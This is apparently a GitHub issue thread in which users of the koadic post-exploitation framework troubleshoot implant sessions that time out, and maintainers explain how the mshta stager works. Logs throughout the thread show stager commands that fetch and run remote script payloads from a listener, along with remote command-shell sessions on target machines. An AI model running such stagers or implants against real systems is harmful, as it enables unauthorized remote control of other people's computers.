### ISSUE TITLE
Zombie Times Out

### ISSUE THREAD

**Issue by rishdang** [zerosum0x0/koadic#36]
Greetings,

I have setup koadic on Debian 9 and it loads fine. The test target system is windows 7 with firewall and no antivirus.  The problem is, whatever stager I use, zombie always times out in next 2 seconds or less. A typical session looks like this - 

```
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://10.1.10.209:9999/L9OjI
[>] mshta http://10.1.10.209:9999/L9OjI
[+] Zombie 0: Staging new connection (x.y.z.a)
[!] Zombie 0: Timed out.
```
Troubleshooting done - 

1. I have tried using different server (Ubuntu/Debian - wheezy/jessie) to no avail.
2. Tried different test machines (Windows 10, Windows 8, different configurations) to no avail. 
3. Checked iptables and flushed them out. 
4. Tried HTTPS connection through self signed certificate and using letsencrypt. Same result.
5. Tried setup in same LAN subnet, in NAT configuration and over WAN - same result.
6. Formatted everything and cloned everything from scratch - same result.
7. Tried different stagers (regsvr/disk/rundll32_js) as well to no avail.
8. *update* checked #20 , would like to add that I have tried it from command line as well to same result.

- [ ] Have yet to take a packet capture and check which one of the endpoints is sending the RST packet, this I will probably do over this weekend. 
- [ ] Have yet to try koadic on a python 3 based setup, again a task for this weekend.

Is there anything I am missing which is preventing a stable zombie connection - any configuration, essential firewall rules or framework essentials? 

Apart from this, 

1. Does koadic has inbuilt verbose logging functionality which  I can check and zero down on connection issues or what is going wrong.
2. Any command automation mechanism which can be run through cmdshell implant to run some quick commands on target system when a connection is initiated?

Thanks for your time,
rish

**Comment by zerosum0x0** [comment]
I've just added a verbose mode. Start koadic as normal and type `verbose 1`, then try to stage. May need to add more functions to the logging but at least there's a start.

**Comment by rishdang** [comment]
Awesome, let me try that. 
Meanwhile, I have taken a packet capture and have identified that the server itself is sending FIN packets post sending the staging code. The new Debian 9 setup has letsencrypt certificate hosted on a test cloud server, will experiment and let you know.

Thanks!

**Comment by rishdang** [comment]
Tried it with both HTTP and HTTPS options, PFB logs.

With HTTP
```
(koadic: sta/js/mshta)# verbose 1
[*] Verbose mode: On
(koadic: sta/js/mshta)# set LHOST X.Y.Z.A
[+] LHOST => X.Y.Z.A
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://X.Y.Z.A:9999/gCvFM
[>] mshta http://X.Y.Z.A:9999/gCvFM
[v] handler::handle() - Incoming HTTP from ('A.B.C.D', 25269)
[v] handler::handle_new_session()
[+] Zombie 0: Staging new connection (A.B.C.D)
[v] handler::reply() - sending status 200 with 19345 bytes to ('A.B.C.D', 25269)
(koadic: sta/js/mshta)# cmdshell 0
[koadic: ZOMBIE 0 (A.B.C.D) - cmd.exe]> whoami
[*] Zombie 0: Job 0 (implant/manage/exec_cmd) created.
[!] Zombie 0: Timed out.
[koadic: ZOMBIE 0 (A.B.C.D) - cmd.exe]> exit
```
HTTPS

```
(koadic: sta/js/mshta)# info

        NAME        VALUE           REQ     DESCRIPTION
        -----       ------------    ----    -------------
        LHOST       X.Y.Z.A yes     Where the stager should call home
        LPORT       9999            yes     The port to listen for stagers on
        EXPIRES                     no      MM/DD/YYYY to stop calling home
        KEYPATH     /etc/ssl/pri... no      Private key for TLS communications
        CERTPATH    /etc/ssl/cer... no      Certificate for TLS communications

(koadic: sta/js/mshta)# verbose 1
[*] Verbose mode: On
(koadic: sta/js/mshta)# run
[+] Spawned a stager at https://X.Y.Z.A:9999/5RCB4
[>] mshta https://X.Y.Z.A:9999/5RCB4
[v] handler::handle() - Incoming HTTP from ('A.B.C.D', 33786)
[v] handler::handle_new_session()
[+] Zombie 0: Staging new connection (A.B.C.D)
[v] handler::reply() - sending status 200 with 19351 bytes to ('A.B.C.D', 33786)
(koadic: sta/js/mshta)# cmdshell 0
[v] handler::handle() - Incoming HTTP from ('A.B.C.D', 42767)
[v] handler::reply() - sending status 404 with 0 bytes to ('A.B.C.D', 42767)
[koadic: ZOMBIE 0 (A.B.C.D) - cmd.exe]> whoami
[*] Zombie 0: Job 0 (implant/manage/exec_cmd) created.
[!] Zombie 0: Timed out.
[koadic: ZOMBIE 0 (A.B.C.D) - cmd.exe]> exit
(koadic: sta/js/mshta)# zombies

        ID   IP              STATUS  LAST SEEN
        ---  ---------       ------- ------------
        0*   A.B.C.D Dead    2017-11-17 08:17:13

Use "zombies ID" for detailed information about a session.

```

All I can see is "[!] Zombie 0: Timed out.", is there any way to increase the verbosity of logs? 

Thanks,
rish

**Comment by zerosum0x0** [comment]
I see you're using a cert, so you cannot specify an IP. It must be a domain and the certificate must be valid. Anything that would cause an error in say, IE or any sensible web browser, will fail.

**Comment by rishdang** [comment]
Sure, thanks for inputs, will add alerts and test it.
As for the certificate part testing part, I tested it with both domain and IP with same results.

Appreciate your prompt inputs.
rish

**Comment by SeemantBisht** [comment]
I am also facing "Zombie TimeOut" issue, both within the LAN as well as WAN. Is there any workaround solution for this. 
@rishdang Thanks for raising the issue.

**Comment by TheNaterz** [comment]
@SeemantBisht, could you also post Koadic output with verbose mode on? Also, can you confirm that you are only copy/pasting the mshta stager into your Windows command shell?

**Comment by SeemantBisht** [comment]
@TheNaterz , Thanks for your reply. 

I got Zombie 0 stable through bash bunny.
Zombie 1 Timed out. I opened the link through Internet Explorer.
Zombie 2 Timed out. I opened the link through Chrome.


Output for the same is mentioned below:

(koadic: sta/js/mshta)# info

        NAME        VALUE               REQ     DESCRIPTION     
        -----       ------------        ----    -------------   
        SRVHOST     192.168.182.129     yes     Where the stager should call home
        SRVPORT     9999                yes     The port to listen for stagers on
        EXPIRES                         no      MM/DD/YYYY to stop calling home
        KEYPATH                         no      Private key for TLS communications
        CERTPATH                        no      Certificate for TLS communications

(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.182.129:9999/SAl5K
[!] Avoid manually editing this URL!!!
[>] mshta http://192.168.182.129:9999/SAl5K
(koadic: sta/js/mshta)# verbose 1
[*] Verbose mode: On
[v] handler::handle() - Incoming HTTP from ('192.168.182.1', 2787)
[v] handler::handle_new_session()

[+] Zombie 0: Staging new connection (192.168.182.1)
[v] handler::reply() - sending status 200 with 19710 bytes to ('192.168.182.1', 2787)
[v] handler::handle() - Incoming HTTP from ('192.168.182.1', 2788)
[v] handler::find_session() - found session.key = d8847c990a494br19e6e92c673b3e2cc
[v] session::parse_user_info() - XXXX\CCC01~~~ASD-LAP-111~~~Microsoft Windows 10 Pro~~~\\Domain~~~64-bit~~~C:\Windows\system32\WindowsPowerShell\v1.0

[+] Zombie 0:  XXXX\CCC01 @ ASD-LAP-111 -- Microsoft Windows 10 Pro
[v] handler::reply() - sending status 200 with 0 bytes to ('192.168.182.1', 2788)
[v] handler::handle() - Incoming HTTP from ('192.168.182.1', 2789)
[v] handler::find_session() - found session.key = d8847c990a494br19e6e92c673b3e2cc
[v] handler::handle_stage()
[v] handler::reply() - sending status 200 with 19715 bytes to ('192.168.182.1', 2789)
[v] handler::handle() - Incoming HTTP from ('192.168.182.1', 2790)
[v] handler::find_session() - found session.key = d8846c990a494bc19e6e92c673b3e2cc
[v] handler::handle() - Incoming HTTP from ('192.168.182.1', 2958)
[v] handler::handle_new_session()
[+] Zombie 1: Staging new connection (192.168.182.1)
[v] handler::reply() - sending status 200 with 19710 bytes to ('192.168.182.1', 2958)
[v] handler::handle() - Incoming HTTP from ('192.168.182.1', 2959)
[v] handler::reply() - sending status 404 with 0 bytes to ('192.168.182.1', 2959)
**[!] Zombie 1: Timed out.**
[v] handler::handle() - Incoming HTTP from ('192.168.182.1', 2963)
[v] handler::handle_new_session()
[+] Zombie 2: Staging new connection (192.168.182.1)
[v] handler::reply() - sending status 200 with 19710 bytes to ('192.168.182.1', 2963)
**[!] Zombie 2: Timed out.**
(koadic: sta/js/mshta)# zombies

        ID   IP              STATUS  LAST SEEN       
        ---  ---------       ------- ------------    
        0    192.168.182.1   Alive   2017-12-25 00:21:48
        1*   192.168.182.1   Dead    2017-12-25 00:19:57
        2*   192.168.182.1   Dead    2017-12-25 00:21:04

**Comment by TheNaterz** [comment]
@SeemantBisht, great thanks! Alright so the problem is that you can't stage the mshta stager through a browser, it has to be done through a command shell. The mshta executable is responsible for running .HTA files, and the JavaScript/VBScript payloads contained therein, which is how Koadic is able to work. If you try to access the link through a browser, it won't be able to stage which is why Zombies 1 and 2 timed out.

**Comment by SeemantBisht** [comment]
@TheNaterz, Thanks for your instant reply. Is there any stager which can work directly through browser and is stable.

**Comment by TheNaterz** [comment]
@SeemantBisht, sorry, but at the moment, we don't have any stagers that are designed to work like that.

**Comment by SeemantBisht** [comment]
@TheNaterz, alright. Thanks alot.

**Comment by rishdang** [comment]
This is sorted, nailed it down to infrastructure issue. Sorry for an delayed response as this testing was put on back burner.

**Comment by TheNaterz** [comment]
@rishdang oh hey btw, on your first comment in the thread, you mentioned if there was any support for command automation once a zombie got staged. Just fyi, I added that to koadic along with a multi_module implant a few days ago. Good idea and thanks for (indirectly) suggesting it!

**Comment by rishdang** [comment]
You are too kind : ]
